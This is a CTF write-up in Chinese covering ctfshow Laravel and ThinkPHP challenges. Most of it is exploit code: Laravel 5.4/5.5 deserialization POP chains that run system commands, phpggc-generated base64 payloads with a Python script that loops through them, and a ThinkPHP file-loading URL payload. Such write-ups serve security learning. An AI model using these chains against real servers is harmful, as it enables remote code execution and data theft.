ctfshow框架复现

web466

Laravel5.4版本,查看网上找到poc:

<?php
/*
 * @Author: Ikalovic 2298268003@qq.com
 * @Date: 2025-09-25 23:19:08
 * @LastEditors: Ikalovic 2298268003@qq.com
 * @LastEditTime: 2025-09-25 23:22:16
 * @FilePath: \undefinede:\CTF\ctf\web\知识积累\网站框架漏洞积累\Laravel5.4\poc2.php
 * @Description: 这是默认设置,请设置`customMade`, 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE
 */
namespace Illuminate\Validation {
    class Validator {
       public $extensions = [];
       public function __construct() {
            $this->extensions = ['' => 'system'];
       }
    }
}

namespace Illuminate\Broadcasting {
    use  Illuminate\Validation\Validator;
    class PendingBroadcast {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Validator();
            $this->event = $cmd;
        }
    }
    echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>

使用方法：/admin/序列化串base64

cat /flag得到flag

web467

Laravel5.5版本

用网上链条:

<?php
namespace Illuminate\Broadcasting
{
    use  Illuminate\Events\Dispatcher;
    class PendingBroadcast
    {
        protected $events;
        protected $event;
        public function __construct($cmd)
        {
            $this->events = new Dispatcher($cmd);
            $this->event=$cmd;
        }
    }
    echo base64_encode(serialize(new PendingBroadcast("cat /flag")));
}


namespace Illuminate\Events
{
    class Dispatcher
    {
        protected $listeners;
        public function __construct($event){
            $this->listeners=[$event=>['system']];
        }
    }
}

web468

Laravel5.5版本

使用工具phpggc,poc:./phpggc Laravel/RCE3 system "cat /f* >1.txt"|base64

得到exp:

Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIA
KgBldmVudHMiO086Mzk6IklsbHVtaW5hdGVcTm90aWZpY2F0aW9uc1xDaGFubmVsTWFuYWdlciI6
Mzp7czo2OiIAKgBhcHAiO3M6MTQ6ImNhdCAvZiogPjEudHh0IjtzOjE3OiIAKgBkZWZhdWx0Q2hh
bm5lbCI7czoxOiJ4IjtzOjE3OiIAKgBjdXN0b21DcmVhdG9ycyI7YToxOntzOjE6IngiO3M6Njoi
c3lzdGVtIjt9fX0K
```

Web469-472

均可以用phpggc速通，写个py脚本遍历rce payload：

import os
import requests
 
for i in range(1,20):
    data=os.popen(f"./phpggc  Laravel/RCE{i} system 'cat /f* >1.txt'|base64").read()
    url = f"https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/admin/{data}"
    requests.get(url)
    res = requests.get("https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/1.txt").text
    if 'ctfshow' in res:
    	 print(res)
         print(f"RCE{i}success!")

web473

使用工具一把梭

payload：

https://6a7b4eda-5fa4-48c5-9991-7dfe90e70c8c.challenge.ctf.show?s=index/\think\Lang/load&file=/flag

web474-476

Thinkphp框架判断：访问http://xxx:8080/router.php，Thinkphp里面必定含有这个php文件。再次访问http://xxx:8080/?s=a

poc网址：https://blog.csdn.net/qq_67473072/article/details/131696323

推荐一把梭解决